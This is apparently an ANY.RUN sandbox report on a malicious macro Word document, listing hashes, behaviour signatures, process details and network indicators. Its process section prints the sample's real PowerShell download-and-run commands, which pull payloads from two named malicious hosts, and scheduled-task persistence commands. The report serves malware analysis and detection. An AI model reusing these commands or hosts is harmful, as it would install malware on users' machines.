analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc

Full analysis: https://app.any.run/tasks/0833a9fd-5e14-4162-9e8c-d5f942f315a6
Verdict: Malicious activity
Analysis date: March 31, 2020, 07:01:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
malware
psw
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

666575B7B3FF327C8FB154C2E700F237

SHA1:

428DD2ADCADCFBDEB11F43F5C4F7B63F960E8D79

SHA256:

9233133A60362D5507DFE84A491ECF29B9B7A8D5C3FAB52E1D9ACCF2F4A678FB

SSDEEP:

1536:9/r9cNthJFXWDDP9LDjkmvMOxU6upDiWEi1WQ2FGYe5fb47mrRS4X:52NtF0xwF6u9EicFjMjum9t

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads the Task Scheduler COM API

      • WINWORD.EXE (PID: 1756)
      • WINWORD.EXE (PID: 3312)
      • WINWORD.EXE (PID: 1724)
      • WINWORD.EXE (PID: 2424)
      • WINWORD.EXE (PID: 3864)
      • WINWORD.EXE (PID: 3344)
      • WINWORD.EXE (PID: 680)
      • WINWORD.EXE (PID: 604)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 3152)
      • WINWORD.EXE (PID: 1920)

    • Application launched itself

      • WINWORD.EXE (PID: 3152)
      • WINWORD.EXE (PID: 1920)

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 3492)
      • WINWORD.EXE (PID: 2192)
      • WINWORD.EXE (PID: 3328)
      • WINWORD.EXE (PID: 2004)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3152)
      • WINWORD.EXE (PID: 3492)
      • WINWORD.EXE (PID: 1920)
      • WINWORD.EXE (PID: 2004)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3152)
      • WINWORD.EXE (PID: 1920)

    • Manual execution by user

      • WINWORD.EXE (PID: 1920)
      • explorer.exe (PID: 1852)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x66751183
ZipCompressedSize: 423
ZipUncompressedSize: 1768
ZipFileName: [Content_Types].xml

XML

Template: Normal.dotm
TotalEditTime: -
Pages: 5
Words: 106
Characters: 606
Application: Microsoft Office Word
DocSecurity: None
Lines: 5
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • タイトル
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 711
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
Keywords: -
LastModifiedBy: -
RevisionNumber: 1
CreateDate: 2020:03:09 00:44:00Z
ModifyDate: 2020:03:31 01:32:00Z

XMP

Title: -
Subject: -
Creator: -
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
66
Monitored processes
15
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe winword.exe winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe winword.exe explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3152"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1756"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn GncNet /TR "%APPDATA%\GncNet\smssr.exe BoostPC GncSoftware" /SC MINUTE /MO 10 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3312"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn BoostPC /TR "%USERPROFILE%\BoostPC\BoostPC.exe" /SC MINUTE /MO 30 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2424"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn BoostB2B /TR "%USERPROFILE%\BoostPC\b2bClient.exe" /SC MINUTE /MO 16 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1724"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn GncSoftware /TR "%APPDATA%\GncSoftware\GncSoftware.exe" /SC MINUTE /MO 30 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3492"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -ep Bypass -Command mkdir $env:APPDATA\GncNet ; $cli = New-Object System.Net.WebClient ; $cli.Headers['User-Agent'] = 'Mozila/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20191232 FireFox/72.0' ; $cli.DownloadFile('http://wp.hitominote.com/smessr/retouch8.php', $env:APPDATA + '\GncNet\smssr.db') ; While($true){ if ((Get-Item $env:APPDATA'\GncNet\smssr.db').length -eq 8704){ Copy-Item -force -Path $env:APPDATA'\GncNet\smssr.db' -Destination $env:APPDATA'\GncNet\smssr.exe'; $rr='2020' ; Break }} ; $cli.DownloadFile('http://wp.hitominote.com/smessr/favicon.ico?'+$rr, $env:APPDATA+'\GncNet\c.db')C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2192"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -ep Bypass -Command mkdir $env:USERPROFILE\BoostPC ; $cli = New-Object System.Net.WebClient ; $cli.Headers['User-Agent'] = 'Mozila/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20191232 FireFox/72.0' ; $cli.DownloadFile('http://nano.toyota-rnd.com/cdn/proc1.php', $env:USERPROFILE + '\BoostPC\BoostPC.db') ; While($true){ if ((Get-Item $env:USERPROFILE'\BoostPC\BoostPC.db').length -eq 11264){ Break }} ; $cli.DownloadFile('http://nano.toyota-rnd.com/cdn/favicon.ico?'+$rr, $env:USERPROFILE+'\BoostPC\c.db')C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1920"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3864"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn GncNet /TR "%APPDATA%\GncNet\smssr.exe BoostPC GncSoftware" /SC MINUTE /MO 10 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3344"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn BoostPC /TR "%USERPROFILE%\BoostPC\BoostPC.exe" /SC MINUTE /MO 30 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Total events
4 163
Read events
2 801
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
6
Unknown types
6

Dropped files

PID
Process
Filename
Type
3152WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR79FB.tmp.cvr
MD5:
SHA256:
3152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4701EC5E.jpg
MD5:
SHA256:
3152WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~WRD0000.tmp
MD5:
SHA256:
3152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4A4EF4CC-71E8-4D72-B72F-4DCD60FE73B3}.tmp
MD5:
SHA256:
3152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{01B590A7-13AC-4924-8DF1-A37188210614}.tmp
MD5:
SHA256:
3152WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{002FDB8E-6816-4CC2-9E95-8FE294F34770}.tmp
MD5:
SHA256:
1920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR1CE2.tmp.cvr
MD5:
SHA256:
3152WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8158F2A78EA25D9CDB16A209393DBA15
SHA256:9D92FE0455EF8B32F06D17740716398E933ED7B64C9D740CBE5059B9B3A1CBDE
1920WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc.LNKlnk
MD5:9F8CED5142BDCA975961EB5DCF830688
SHA256:87CC3F356390ACF8CB9AFDEF690B44ED214AC0769307D48103A35D0900361AC5
3152WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc.LNKlnk
MD5:FA429F0454537FEE9B670ED45B503100
SHA256:0FED7F13DCC56D7743C6036CAEFB8EF51C9EE1CB9B50022DE0FD1B055981A7BC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2004
WINWORD.EXE
GET
404
88.119.160.2:80
http://wp.hitominote.com/smessr/retouch8.php
LT
html
315 b
malicious
2192
WINWORD.EXE
GET
404
111.90.144.164:80
http://nano.toyota-rnd.com/cdn/proc1.php
MY
html
1.21 Kb
suspicious
3328
WINWORD.EXE
GET
404
111.90.144.164:80
http://nano.toyota-rnd.com/cdn/proc1.php
MY
html
1.21 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2004
WINWORD.EXE
88.119.160.2:80
wp.hitominote.com
Informacines sistemos ir technologijos, UAB
LT
unknown
2192
WINWORD.EXE
111.90.144.164:80
nano.toyota-rnd.com
Shinjiru Technology Sdn Bhd
MY
suspicious
3492
WINWORD.EXE
88.119.160.2:80
wp.hitominote.com
Informacines sistemos ir technologijos, UAB
LT
unknown
3328
WINWORD.EXE
111.90.144.164:80
nano.toyota-rnd.com
Shinjiru Technology Sdn Bhd
MY
suspicious

DNS requests

Domain
IP
Reputation
wp.hitominote.com
  • 88.119.160.2
unknown
nano.toyota-rnd.com
  • 111.90.144.164
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc